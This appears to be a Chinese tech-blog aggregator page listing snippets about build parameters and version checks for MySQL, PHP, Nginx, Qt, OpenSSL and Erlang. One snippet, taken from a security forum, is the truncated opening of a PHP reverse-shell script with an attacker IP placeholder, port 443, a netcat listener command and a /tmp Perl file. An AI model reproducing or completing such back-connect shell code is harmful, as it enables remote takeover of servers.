Mysql安 装版本:5.6.20编译参数:cmake -DCMAKE_INSTALL_PREFIX=/xxx/mysql -DMYSQL_UNIX_ADDR=/xxx/mysql/mysql.sock -DDEFAULT_CHARSET=utf8 -DDEFAULT_COLLATION=utf8_...
分类:
数据库 时间:
2014-12-02 20:46:06
阅读次数:
196
1、查看php的编译参数/usr/local/php/bin/php-config--configure-options或者/usr/local/php/bin/php-r"phpinfo();"|grep-iconfigure或者/usr/local/php/bin/php-i|grepconfigure2、查看mysql的编译参数cat/usr/local/mysql/bin/mysqlbug|grepconfigure3、查看Nginx的编译参数/..
分类:
数据库 时间:
2014-11-27 18:46:14
阅读次数:
176
erlang添加openssl支持(erlang连接mysql使用):1、配置openssl编译参数:./configure --prefix=/usr/local/service/openssl2、修改makefile编译选项,在CFLAG参数中加上-fPIC-shared 执行make&&mak...
分类:
其他好文 时间:
2014-11-26 06:38:53
阅读次数:
204
https://www.t00ls.net/viewthread.php?tid=28086
<?php
/*******************************
*查看phpinfo编译参数--enable-pcntl
*作者Spider
*nc-vvlp443
********************************/
$ip=‘xxx.xxx.xxx.xxx‘;
$port=‘443‘;
$file=‘/tmp/bc.pl‘;
header("content-T..
分类:
Web程序 时间:
2014-11-20 15:37:45
阅读次数:
511
这个函数用来编译一段字符串的源码,结果可以生成字节码或者AST(抽像语法树),字节码可以使用函数exec()来执行,而AST可以使用eval()来继续编译。参数source是一串字符串的源码,或者是AST对象数组。参数filename是读取字符串的文件对象,如果不是从文件里读取源码来编译,那么这里可以放一些用来标识这些代码的字符串。参数mode是用来指明那种表示的源码类型;如果是exec类型,表示...
分类:
编程语言 时间:
2014-11-12 21:19:50
阅读次数:
295
编译参数 configure -confirm-license -opensource -developer-build -static -prefix D:\libraries\Qt5.3.1s -mp -platform win32-msvc2013 -opengl desktop -no-an...
分类:
其他好文 时间:
2014-11-10 19:54:41
阅读次数:
311
查看apache版本/usr/sbin/apachectl-vhttpd-v安装目录,使用apachectl-v查看mysql版本mysql–help|grepDistribmysql-Vmysql/bin/mysql-uroot-p-e“selectversion()”/binmysqladminversion查看linux版本lsb_release-ahead-n1/etc/issuecat/etc/redhat-release(redhat)rpm-qre..
分类:
数据库 时间:
2014-11-05 15:01:54
阅读次数:
175
Linux下安装Nginx,需要保证一些依赖的库先被安装好。1、安装好g++、ssl、pcre、zlib库文件2、安装Nginx 1)执行./configure 命令编译,需指定一些编译参数 --prefix= 定义安装目录(默认/usr/local/nginx) --sbin-path...
分类:
其他好文 时间:
2014-11-01 14:37:51
阅读次数:
282
DELPHI的版本宏: VER80 - Delphi 1 VER90 - Delphi 2 VER100 - Delphi 3 VER120 - Delphi 4 VER130 - Delphi 5 VER140 - Delphi 6 VER150 - Delphi 7 VER160 - Delph...
1.CentOS5.8x86_64位采用最小化安装,系统经过了基本优化篇2.nginx版本:nginx-1.4.73.源码包存放位置:/home/oldboy/tools4.源码包编译安装位置:/application/,mysql装在/usr/local/mysql一.lamp和lanp环境查看编设参数:1.nginx查看[root@ser200nginx]#sbin/nginx-v
nginxver..
分类:
数据库 时间:
2014-10-23 21:03:13
阅读次数:
259